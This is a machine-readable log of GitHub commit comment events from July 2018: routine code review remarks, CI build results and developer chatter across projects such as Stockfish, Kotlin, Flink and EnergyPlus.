{"id":"7989563207","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29765492,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-19T14:32:05Z","updated_at":"2018-07-19T14:32:05Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T14:32:05Z"}
{"id":"7989565113","type":"CommitCommentEvent","actor":{"login":"NebulousDev"},"repo":{"name":"NebulousDev/WyvernEngine"},"payload":{"comment":{"id":29765499,"position":null,"line":null,"path":null,"commit_id":"ffedd34b135ce0f52b614c8f66b28df075edb5c9","created_at":"2018-07-19T14:32:21Z","updated_at":"2018-07-19T14:32:21Z","author_association":"OWNER","body":"typo: system(\"PAUSE\") not sysyem(\"PAUSE\")"}},"created_at":"2018-07-19T14:32:21Z"}
{"id":"7989568644","type":"CommitCommentEvent","actor":{"login":"xiaoqi31825"},"repo":{"name":"xiaoqi31825/test"},"payload":{"comment":{"id":29765510,"position":87,"line":87,"path":".gitignore","commit_id":"4462a7f48d188df260eb3fb4cc737144004d113b","created_at":"2018-07-19T14:32:52Z","updated_at":"2018-07-19T14:32:52Z","author_association":"OWNER","body":"print(\"hello world\")"}},"created_at":"2018-07-19T14:32:52Z"}
{"id":"7989571117","type":"CommitCommentEvent","actor":{"login":"jwilsjustin"},"repo":{"name":"ammoready/sports_south"},"payload":{"comment":{"id":29765516,"position":null,"line":null,"path":null,"commit_id":"9c5ec79b06340bd2ce32658bc65685d713f49aab","created_at":"2018-07-19T14:33:14Z","updated_at":"2018-07-19T14:33:14Z","author_association":"CONTRIBUTOR","body":"Before: 😳 \r\n```\r\nTime:   855.95 seconds\r\nMemory: 1196.87 MB\r\n```\r\n\r\nAfter: 😏 \r\n```\r\nTime:   929.18 seconds\r\nMemory: 66.09 MB\r\n```"}},"created_at":"2018-07-19T14:33:14Z"}
{"id":"7989573144","type":"CommitCommentEvent","actor":{"login":"diegopradogesto"},"repo":{"name":"Ultimaker/CuraDrivePlugin"},"payload":{"comment":{"id":29765520,"position":null,"line":null,"path":null,"commit_id":"25891778d9798d53a6b4e3ee92ec29ff9ea94eb0","created_at":"2018-07-19T14:33:31Z","updated_at":"2018-07-19T14:33:31Z","author_association":"NONE","body":"Too weird. I was taking a look, but I leave my sharp eyes at home and I don't know how to solve it."}},"created_at":"2018-07-19T14:33:31Z"}
{"id":"7989573651","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29765522,"position":null,"line":null,"path":null,"commit_id":"78960f38ff0122a23423d3c5a85d2433bb5eb037","created_at":"2018-07-19T14:33:35Z","updated_at":"2018-07-19T14:33:35Z","author_association":"NONE","body":"I think decreasing the depth limit will at least at LTC loose elo because depth 16 and 17 don't give a bonus anymore (and there are important as my stat update measurements shows, see https://groups.google.com/forum/?fromgroups=#!topic/fishcooking/--02xbp9wM4).\r\n\r\nPerhaps something like `return d > 17 ? 0 : std::min(10350, 46 * d * d); `is better. But then its not a simplification anymore."}},"created_at":"2018-07-19T14:33:35Z"}
{"id":"7989574137","type":"CommitCommentEvent","actor":{"login":"mcornella"},"repo":{"name":"robbyrussell/oh-my-zsh"},"payload":{"comment":{"id":29765524,"position":null,"line":null,"path":null,"commit_id":"0608bb768fea1222410c5bd9b576bb1098409ffa","created_at":"2018-07-19T14:33:39Z","updated_at":"2018-07-19T14:33:39Z","author_association":"COLLABORATOR","body":"Open an issue."}},"created_at":"2018-07-19T14:33:39Z"}
{"id":"7989574557","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29765525,"position":6,"line":24,"path":"Lesson_1/r_triangle.rb","commit_id":"8c0168607ea72eef58b920516fac41e05399e52a","created_at":"2018-07-19T14:33:43Z","updated_at":"2018-07-19T14:33:43Z","author_association":"NONE","body":"Тут можно сравнивать только катеты. Если мы знаем, что треугольник прямоугольный, то гипотинуза будет длиннейшей стороной"}},"created_at":"2018-07-19T14:33:43Z"}
{"id":"7989575889","type":"CommitCommentEvent","actor":{"login":"baluragala"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29765535,"position":null,"line":null,"path":null,"commit_id":"a5450fc6f7459f5d163d57801071fdb76639752c","created_at":"2018-07-19T14:33:55Z","updated_at":"2018-07-19T14:33:55Z","author_association":"COLLABORATOR","body":"I do not see last requested changes, could you please let me know if I am missing something?"}},"created_at":"2018-07-19T14:33:55Z"}
{"id":"7989576880","type":"CommitCommentEvent","actor":{"login":"tonyyyye"},"repo":{"name":"shinoi2/fireplace"},"payload":{"comment":{"id":29765540,"position":5,"line":466,"path":"fireplace/actions.py","commit_id":"a6ee929c9678e2f40ae71b8ad2a6a31334d261d6","created_at":"2018-07-19T14:34:04Z","updated_at":"2018-07-19T14:34:04Z","author_association":"NONE","body":"这个5点以上cost的值检测是为了什么？"}},"created_at":"2018-07-19T14:34:04Z"}
{"id":"7989578522","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29765546,"position":4,"line":4,"path":"compiler/testData/cli/jvm/kt19628.kt","commit_id":"eb0faac4b30f179bfeb0168996efe6ded8cca668","created_at":"2018-07-19T14:34:18Z","updated_at":"2018-07-19T14:34:18Z","author_association":"MEMBER","body":"Also, please check not only constructor parameters but just properties too:\r\n```\r\nannotation class Anno(val x: Int)\r\n\r\nclass Foo {\r\n    @get:Anno(Unresolved)\r\n    val something = \"\"\r\n}\r\n```"}},"created_at":"2018-07-19T14:34:18Z"}
{"id":"7989583747","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29765565,"position":null,"line":null,"path":null,"commit_id":"0a03becc60423c02a7e155807379fa0109778b95","created_at":"2018-07-19T14:35:08Z","updated_at":"2018-07-19T14:35:08Z","author_association":"NONE","body":"Hey. .  that's my code! :)"}},"created_at":"2018-07-19T14:35:08Z"}
{"id":"7989584069","type":"CommitCommentEvent","actor":{"login":"jeffdill2"},"repo":{"name":"ammoready/sports_south"},"payload":{"comment":{"id":29765566,"position":null,"line":null,"path":null,"commit_id":"9c5ec79b06340bd2ce32658bc65685d713f49aab","created_at":"2018-07-19T14:35:11Z","updated_at":"2018-07-19T14:35:11Z","author_association":"CONTRIBUTOR","body":"If I know anything about computers (and I know everything about them), I'm pretty sure the higher number is the better one. 🤔 "}},"created_at":"2018-07-19T14:35:11Z"}
{"id":"7989586888","type":"CommitCommentEvent","actor":{"login":"ewancook"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":29765573,"position":null,"line":null,"path":null,"commit_id":"9c1902942943e1d9fd70f553748fb33422995c48","created_at":"2018-07-19T14:35:34Z","updated_at":"2018-07-19T14:35:34Z","author_association":"NONE","body":"Removes QtCore dependency in `periodic_table_view.py` through replacing signals/slots with a standard subscriber style event system."}},"created_at":"2018-07-19T14:35:34Z"}
{"id":"7989592428","type":"CommitCommentEvent","actor":{"login":"jwilsjustin"},"repo":{"name":"ammoready/sports_south"},"payload":{"comment":{"id":29765584,"position":null,"line":null,"path":null,"commit_id":"9c5ec79b06340bd2ce32658bc65685d713f49aab","created_at":"2018-07-19T14:36:26Z","updated_at":"2018-07-19T14:36:26Z","author_association":"CONTRIBUTOR","body":"Keep telling yourself that, Jeff! :rage1: "}},"created_at":"2018-07-19T14:36:26Z"}
{"id":"7989593438","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29765588,"position":16,"line":76,"path":"compiler/frontend/src/org/jetbrains/kotlin/descriptors/annotations/AnnotationSplitter.kt","commit_id":"eb0faac4b30f179bfeb0168996efe6ded8cca668","created_at":"2018-07-19T14:36:36Z","updated_at":"2018-07-19T14:36:36Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-19T14:36:36Z"}
{"id":"7989595449","type":"CommitCommentEvent","actor":{"login":"ChrisTerBeke"},"repo":{"name":"Ultimaker/CuraDrivePlugin"},"payload":{"comment":{"id":29765594,"position":null,"line":null,"path":null,"commit_id":"25891778d9798d53a6b4e3ee92ec29ff9ea94eb0","created_at":"2018-07-19T14:36:55Z","updated_at":"2018-07-19T14:36:55Z","author_association":"MEMBER","body":"Shall we publish it anyways and solve this later (as the whole thing might get merged into Cura anyways). Then at least the users can enjoy the plugin properly in dark mode."}},"created_at":"2018-07-19T14:36:55Z"}
{"id":"7989601340","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29765608,"position":2,"line":20,"path":"Lesson_1/r_triangle.rb","commit_id":"8c0168607ea72eef58b920516fac41e05399e52a","created_at":"2018-07-19T14:37:47Z","updated_at":"2018-07-19T14:37:47Z","author_association":"NONE","body":"Это рабочее решение. Но можно решить без вложенного ифа. Давай вынесем вычисление Пифагора в переменную которая будет возвращать true/false (как это вычисление сейчас и делает) и скомбинируем со проверкой на равнобедренность. Используй elsif. В одном случае у нас будет прямоугольный и равнобедренный, в другом просто прямоугольный."}},"created_at":"2018-07-19T14:37:47Z"}
{"id":"7989605529","type":"CommitCommentEvent","actor":{"login":"olivergondza"},"repo":{"name":"olivergondza/openstack-cloud-plugin"},"payload":{"comment":{"id":29765615,"position":5,"line":39,"path":"src/main/java/jenkins/plugins/openstack/compute/JCloudsComputer.java","commit_id":"44d0745031a32e1c4b3bddaee70052c6aa7b057a","created_at":"2018-07-19T14:38:25Z","updated_at":"2018-07-19T14:38:25Z","author_association":"OWNER","body":"Be sure the change propagates between threads."}},"created_at":"2018-07-19T14:38:25Z"}
{"id":"7989609179","type":"CommitCommentEvent","actor":{"login":"fvanderbiest"},"repo":{"name":"georchestra/geonetwork"},"payload":{"comment":{"id":29765624,"position":null,"line":null,"path":null,"commit_id":"33ce9791bb2e1aa2539de2d378df9b0602c667aa","created_at":"2018-07-19T14:38:58Z","updated_at":"2018-07-19T14:38:58Z","author_association":"MEMBER","body":"Are you sure this is not a cache ? We do not witness the error anymore on `georchestra-gn3.4-master`."}},"created_at":"2018-07-19T14:38:58Z"}
{"id":"7989612294","type":"CommitCommentEvent","actor":{"login":"olivergondza"},"repo":{"name":"olivergondza/openstack-cloud-plugin"},"payload":{"comment":{"id":29765641,"position":50,"line":122,"path":"src/main/java/jenkins/plugins/openstack/compute/JCloudsRetentionStrategy.java","commit_id":"44d0745031a32e1c4b3bddaee70052c6aa7b057a","created_at":"2018-07-19T14:39:27Z","updated_at":"2018-07-19T14:39:27Z","author_association":"OWNER","body":"Moving this to `JCloudsComputer` that is already a `ExecutorListener`."}},"created_at":"2018-07-19T14:39:27Z"}
{"id":"7989616060","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29765650,"position":null,"line":null,"path":null,"commit_id":"78960f38ff0122a23423d3c5a85d2433bb5eb037","created_at":"2018-07-19T14:40:00Z","updated_at":"2018-07-19T14:40:00Z","author_association":"NONE","body":"Also this should probably tested against my passed evasion_cmh patch which uses the counter move history.\r\n(see https://github.com/official-stockfish/Stockfish/pull/1685)"}},"created_at":"2018-07-19T14:40:00Z"}
{"id":"7989616370","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29765651,"position":7,"line":5,"path":"Lesson_1/triangle_area.rb","commit_id":"1f63e110235d60663e57c764142fc1c1659d3e34","created_at":"2018-07-19T14:40:02Z","updated_at":"2018-07-19T14:40:02Z","author_association":"NONE","body":"Наерно забыл тебе сказать при прошлом ревью, что тут значения могут быть не целыми. Это приведет к не правильным вычислениям. Например\r\n```\r\n2.1.3 :001 > 3 / 2\r\n => 1\r\n2.1.3 :002 > 3.to_f / 2\r\n => 1.5\r\n2.1.3 :003 >\r\n```"}},"created_at":"2018-07-19T14:40:02Z"}
{"id":"7989616739","type":"CommitCommentEvent","actor":{"login":"dinkypumpkin"},"repo":{"name":"Marginal/docker-get_iplayer"},"payload":{"comment":{"id":29765654,"position":7,"line":7,"path":"Dockerfile","commit_id":"5a73d171034849c65c48565e636973bea633c5a9","created_at":"2018-07-19T14:40:06Z","updated_at":"2018-07-19T14:40:06Z","author_association":"NONE","body":"get_iplayer doesn't use the XML::Simple module, so there is no need to install the perl-xml-simple package. Harmless, but unnecessary."}},"created_at":"2018-07-19T14:40:06Z"}
{"id":"7989618251","type":"CommitCommentEvent","actor":{"login":"rbarbosa"},"repo":{"name":"iOS-Goodies/iOS-Goodies"},"payload":{"comment":{"id":29765658,"position":14,"line":22,"path":"Issues/Week239.md","commit_id":"f0e86d7404dc2a473cf31c4567fa0f1d43084067","created_at":"2018-07-19T14:40:19Z","updated_at":"2018-07-19T14:40:19Z","author_association":"CONTRIBUTOR","body":"Thanks @mariusc! Will remove it.\r\n"}},"created_at":"2018-07-19T14:40:19Z"}
{"id":"7989622117","type":"CommitCommentEvent","actor":{"login":"iamhssingh"},"repo":{"name":"civilmachines/drf-account"},"payload":{"comment":{"id":29765665,"position":null,"line":null,"path":null,"commit_id":"2bcf5ff0304fc243f4ebfc832213234888f767c1","created_at":"2018-07-19T14:40:54Z","updated_at":"2018-07-19T14:40:54Z","author_association":"MEMBER","body":"Can we stop comment close # on the issues?\n\nThese comment should be added on commits and not on issue.\n\nNow, comment into issues with @COMMIT_ID to link to the commits in which\nthese issues were solved.\n\nOn 19 July 2018 at 12:18, aditya gupta <notifications@github.com> wrote:\n\n> closed #1 <https://github.com/civilmachines/drf-account/issues/1>\n> closed #2 <https://github.com/civilmachines/drf-account/issues/2>\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/civilmachines/drf-account/commit/2bcf5ff0304fc243f4ebfc832213234888f767c1#commitcomment-29759877>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATpURH0fTTeKPoM5pRgzpURCTF8XGQa1ks5uICvTgaJpZM4VV1xU>\n> .\n>\n"}},"created_at":"2018-07-19T14:40:54Z"}
{"id":"7989623936","type":"CommitCommentEvent","actor":{"login":"Nefelim4ag"},"repo":{"name":"jcmoraisjr/haproxy-ingress"},"payload":{"comment":{"id":29765669,"position":79,"line":258,"path":"README.md","commit_id":"39fa9ebf2560fde609ce30b19be19f47f69f2188","created_at":"2018-07-19T14:41:11Z","updated_at":"2018-07-19T14:41:11Z","author_association":"NONE","body":"s/10253/10254/g"}},"created_at":"2018-07-19T14:41:11Z"}
{"id":"7989624874","type":"CommitCommentEvent","actor":{"login":"kyleam"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29765670,"position":null,"line":null,"path":null,"commit_id":"42677304074df4576b448c1c3a512d8439b19853","created_at":"2018-07-19T14:41:19Z","updated_at":"2018-07-19T14:41:19Z","author_association":"MEMBER","body":"The little change I never knew I needed.  Thanks!"}},"created_at":"2018-07-19T14:41:19Z"}
{"id":"7989626833","type":"CommitCommentEvent","actor":{"login":"thermokarst"},"repo":{"name":"qiime2/q2studio"},"payload":{"comment":{"id":29765672,"position":null,"line":null,"path":null,"commit_id":"08a059961322cb7f74640289b6156597a1361970","created_at":"2018-07-19T14:41:35Z","updated_at":"2018-07-19T14:41:35Z","author_association":"MEMBER","body":"Typo in commit message, should read:\r\n\r\n```\r\nREL: 2018.6.0\r\n```"}},"created_at":"2018-07-19T14:41:35Z"}
{"id":"7989626999","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29765673,"position":null,"line":null,"path":null,"commit_id":"78960f38ff0122a23423d3c5a85d2433bb5eb037","created_at":"2018-07-19T14:41:36Z","updated_at":"2018-07-19T14:41:36Z","author_association":"OWNER","body":"OK. . that makes sense.  I'm trying to address the perceived cliff at depth\n17.  Any idea why such a huge value is helpful at depth 17, but a value of\n0 is best at depth 18?\nSeems like a smoother transition may be helpful.\nWhat about a sigmoid, or a more complex, but precalculated value?\n\nOn Thu, Jul 19, 2018 at 8:33 AM, Stefan Geschwentner <\nnotifications@github.com> wrote:\n\n> I think decreasing the depth limit will at least at LTC loose elo because\n> depth 16 and 17 don't give a bonus anymore (and there are important as my\n> stat update measurements shows, see https://groups.google.com/\n> forum/?fromgroups=#!topic/fishcooking/--02xbp9wM4).\n>\n> Perhaps something like return d > 17 ? 0 : std::min(10350, 46 * d * d);is\n> better. But then its not a simplification anymore.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/78960f38ff0122a23423d3c5a85d2433bb5eb037#commitcomment-29765522>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSKlOi3SAEdfqa7Bp2MR5IEbsyuN4ks5uIJjFgaJpZM4VWg0k>\n> .\n>\n\n\n\n-- \nMichael T. Whiteley\nmobile: 801.707.6886\n"}},"created_at":"2018-07-19T14:41:36Z"}
{"id":"7989627442","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29765674,"position":null,"line":null,"path":null,"commit_id":"0f37632cd30d65174b99b22900d18bf9a2769919","created_at":"2018-07-19T14:41:41Z","updated_at":"2018-07-19T14:41:41Z","author_association":"COLLABORATOR","body":"Puzzle `493-62b014f2` discovered in   [`src/main/config/findbugs-filter.xml`](  https://github.com/php-coder/mystamps/blob/master/src/main/config/findbugs-filter.xml)   and submitted as #930. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-19T14:41:41Z"}
{"id":"7989636771","type":"CommitCommentEvent","actor":{"login":"myrdd"},"repo":{"name":"debops/debops"},"payload":{"comment":{"id":29765692,"position":null,"line":null,"path":null,"commit_id":"43938d076b7484715b2c7507d98efa21cec105d6","created_at":"2018-07-19T14:43:03Z","updated_at":"2018-07-19T14:43:03Z","author_association":"CONTRIBUTOR","body":":+1: "}},"created_at":"2018-07-19T14:43:03Z"}
{"id":"7989637689","type":"CommitCommentEvent","actor":{"login":"LiNk-NY"},"repo":{"name":"Bioconductor/BiocWorkshops"},"payload":{"comment":{"id":29765694,"position":null,"line":null,"path":null,"commit_id":"c968d6cbd0510e710902af9b81f2b340ef2b6b98","created_at":"2018-07-19T14:43:11Z","updated_at":"2018-07-19T14:43:11Z","author_association":"COLLABORATOR","body":"Why not just add patterns `*.err` and `*.log` ? "}},"created_at":"2018-07-19T14:43:11Z"}
{"id":"7989643063","type":"CommitCommentEvent","actor":{"login":"tison1"},"repo":{"name":"tison1/flink"},"payload":{"comment":{"id":29765773,"position":81,"line":81,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/jobmanager/scheduler/CoLocationGroup.java","commit_id":"8231b62ff42aae53ca3a7b552980838ccab824ab","created_at":"2018-07-19T14:43:58Z","updated_at":"2018-07-19T14:43:58Z","author_association":"OWNER","body":"here is a question from 4 years later.\r\n\r\nwhy this method call `ensureCapacity` twice. it seems to solve some issue about concurrency but as the change made in #6353 , this method throws a out of index exception. so i try to add a synchronized block to make sure it is thread-safe #6370 . definitely i think my code is not that perfect. so i come to here, wonder the original purpose of this code and ask advice about the two PRs mentioned above\r\n\r\n@StephanEwen looking forward to your advice. thanks in advance!"}},"created_at":"2018-07-19T14:43:58Z"}
{"id":"7989644221","type":"CommitCommentEvent","actor":{"login":"LiNk-NY"},"repo":{"name":"Bioconductor/BiocWorkshops"},"payload":{"comment":{"id":29765779,"position":32,"line":51,"path":".gitignore","commit_id":"c968d6cbd0510e710902af9b81f2b340ef2b6b98","created_at":"2018-07-19T14:44:09Z","updated_at":"2018-07-19T14:44:09Z","author_association":"COLLABORATOR","body":"Why is this ignored? It's only 1.7 Kb. "}},"created_at":"2018-07-19T14:44:09Z"}
{"id":"7989650795","type":"CommitCommentEvent","actor":{"login":"tison1"},"repo":{"name":"apache/flink"},"payload":{"comment":{"id":29765803,"position":81,"line":81,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/jobmanager/scheduler/CoLocationGroup.java","commit_id":"8231b62ff42aae53ca3a7b552980838ccab824ab","created_at":"2018-07-19T14:45:09Z","updated_at":"2018-07-19T14:45:09Z","author_association":"CONTRIBUTOR","body":"here is a question from 4 years later.\r\n\r\nwhy this method call `ensureCapacity` twice. it seems to solve some issue about concurrency but as the change made in #6353 , this method throws a out of index exception. so i try to add a synchronized block to make sure it is thread-safe #6370 . definitely i think my code is not that perfect. so i come to here, wonder the original purpose of this code and ask advice about the two PRs mentioned above\r\n\r\n@StephanEwen looking forward to your advice. thanks in advance!"}},"created_at":"2018-07-19T14:45:09Z"}
{"id":"7989658204","type":"CommitCommentEvent","actor":{"login":"ondrejmirtes"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29765815,"position":null,"line":null,"path":null,"commit_id":"0e6b5855e8266b27d03141fdc63324f0d8da6c77","created_at":"2018-07-19T14:46:16Z","updated_at":"2018-07-19T14:46:16Z","author_association":"MEMBER","body":"@szepeviktor Can you please send a PR that changes `[Laravel](https://github.com/Weebly/phpstan-laravel)` in the README to the Larastan repo? 😊"}},"created_at":"2018-07-19T14:46:16Z"}
{"id":"7989662762","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_hydrogen"},"payload":{"comment":{"id":29765821,"position":null,"line":null,"path":null,"commit_id":"25020912a10d97007ed99f0a3cb0a4f500017816","created_at":"2018-07-19T14:46:58Z","updated_at":"2018-07-19T14:46:58Z","author_association":"MEMBER","body":"what"}},"created_at":"2018-07-19T14:46:58Z"}
{"id":"7989663133","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"ResurrectionRemix-Devices/device_xiaomi_helium"},"payload":{"comment":{"id":29765822,"position":null,"line":null,"path":null,"commit_id":"8859d7581649305dc2a20e07884438f6e11a0a35","created_at":"2018-07-19T14:47:02Z","updated_at":"2018-07-19T14:47:02Z","author_association":"MEMBER","body":"what"}},"created_at":"2018-07-19T14:47:02Z"}
{"id":"7989663609","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29765825,"position":null,"line":null,"path":null,"commit_id":"5aed00ce594da09cbe4854fc5ad1641917dc2c58","created_at":"2018-07-19T14:47:06Z","updated_at":"2018-07-19T14:47:06Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2944 of 2944 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5aed00ce594da09cbe4854fc5ad1641917dc2c58-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T14:47:06Z"}
{"id":"7989663980","type":"CommitCommentEvent","actor":{"login":"ondrejmirtes"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29765826,"position":17,"line":153,"path":"src/Reflection/PhpDefect/PhpDefectClassReflectionExtension.php","commit_id":"c51f3cb0481fd18a4e2c4cb2f3d8fedb8cab087c","created_at":"2018-07-19T14:47:10Z","updated_at":"2018-07-19T14:47:10Z","author_association":"MEMBER","body":"Yes, that's how it works now. The environment must match, including enabled extensions."}},"created_at":"2018-07-19T14:47:10Z"}
{"id":"7989664775","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29765832,"position":null,"line":null,"path":null,"commit_id":"78960f38ff0122a23423d3c5a85d2433bb5eb037","created_at":"2018-07-19T14:47:17Z","updated_at":"2018-07-19T14:47:17Z","author_association":"NONE","body":"Seems senseful but there were many attempts to extend this formula beyond without success.\r\n\r\nOn effect from even higher updates is that the bonus updates dominates the history values to much. Par example if we would update with the allowed maximum of 10368 the move and capture history values would simply set to 10368 which ignores all other collected history information for this slot. The same would count for the negative updates with -10368 (=Y sets history to -10368). This form of saturation that at the most time all history values are 10368 or -10368 seems not good because it ignores the lower depth informations  and we have now a big flipping of history values from maximum to minimum with one update."}},"created_at":"2018-07-19T14:47:17Z"}
{"id":"7989665406","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29765836,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-19T14:47:23Z","updated_at":"2018-07-19T14:47:23Z","author_association":"CONTRIBUTOR","body":"What do you mean \"is not used in the code\"? Of course the variable is used, why else would you add it?\r\nMy point is this: why add an extra argument to `RD_header(in, &sin, &start, verbose)`,\r\ninstead of reading the whole `RD_hdr_t` structure. It  has a `start` and a `source`,\r\nso read it into there, as members of the structure."}},"created_at":"2018-07-19T14:47:23Z"}
{"id":"7989667605","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/front-end-project-week"},"payload":{"comment":{"id":29765841,"position":null,"line":null,"path":null,"commit_id":"d2acdb71f01671c276ac09c7d7e67e6ba3157913","created_at":"2018-07-19T14:47:43Z","updated_at":"2018-07-19T14:47:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Delete an existing note](https://trello.com/c/bhXW7inE/5-delete-an-existing-note)"}},"created_at":"2018-07-19T14:47:43Z"}
{"id":"7989680254","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.contentlisting"},"payload":{"comment":{"id":29765873,"position":null,"line":null,"path":null,"commit_id":"3867c1a6ce5d984ebfc0c7df73f7c93889f60532","created_at":"2018-07-19T14:49:41Z","updated_at":"2018-07-19T14:49:41Z","author_association":"NONE","body":"@cekk Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.app.contentlisting/42/violations\n```\nplone/app/contentlisting/contentlisting.py:7:1: F401 'plone.app.layout.navigation.root.getNavigationRoot' imported but unused\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-19T14:49:41Z"}
{"id":"7989685431","type":"CommitCommentEvent","actor":{"login":"dinkypumpkin"},"repo":{"name":"Marginal/docker-get_iplayer"},"payload":{"comment":{"id":29765886,"position":6,"line":6,"path":"pvr","commit_id":"5a73d171034849c65c48565e636973bea633c5a9","created_at":"2018-07-19T14:50:27Z","updated_at":"2018-07-19T14:50:27Z","author_association":"NONE","body":"--refresh is ignored with --pvr. You'll need a separate get_iplayer invocation with --refresh to achieve the desired effect. \r\n\r\nIt's more of a personal preference, but you don't need to enforce a timeout with --pvr. get_iplayer uses a lock file to prevent --pvr from stomping on a predecessor that may still be running. You may not want to force downloads to stop mid-flow unless you really need to churn your pvr list every hour. Most broken downloads will resume OK, but it isn't perfect, so you may wind up wasting some bandwidth with downloads that start over from the beginning."}},"created_at":"2018-07-19T14:50:27Z"}
{"id":"7989685853","type":"CommitCommentEvent","actor":{"login":"taimur-akhtar"},"repo":{"name":"faysalali/Project_milstone1"},"payload":{"comment":{"id":29765888,"position":4,"line":12,"path":"app/views/layouts/application.html.erb","commit_id":"4fc081e2ee527683e5ed3918b2b2ab2dd4ca3117","created_at":"2018-07-19T14:50:31Z","updated_at":"2018-07-19T14:50:31Z","author_association":"NONE","body":"use helpers and a better approach for this one."}},"created_at":"2018-07-19T14:50:31Z"}
{"id":"7989691653","type":"CommitCommentEvent","actor":{"login":"pickfire"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29765903,"position":null,"line":null,"path":null,"commit_id":"ada92527301e63e412c67530ae20822adb4aa561","created_at":"2018-07-19T14:51:23Z","updated_at":"2018-07-19T14:51:23Z","author_association":"NONE","body":"The output for insttime will be different in different system, probably different output for different locale (tested with `zh_CN.UTF-8` but looks similar).\r\n\r\nOn Arch: `Dec 29 2017` / `12月 29 2017`\r\nOn Alpine: `May 30 20:53`"}},"created_at":"2018-07-19T14:51:23Z"}
{"id":"7989693997","type":"CommitCommentEvent","actor":{"login":"dhanajee"},"repo":{"name":"dhanajee/Experiment1"},"payload":{"comment":{"id":29765913,"position":1,"line":1,"path":"Readme.txt","commit_id":"b27636d24d9fb2914287c9cc3d7ff7d38e9deba1","created_at":"2018-07-19T14:51:44Z","updated_at":"2018-07-19T14:51:44Z","author_association":"OWNER","body":"Any comments and suggestions to improve the project will be welcomed."}},"created_at":"2018-07-19T14:51:44Z"}
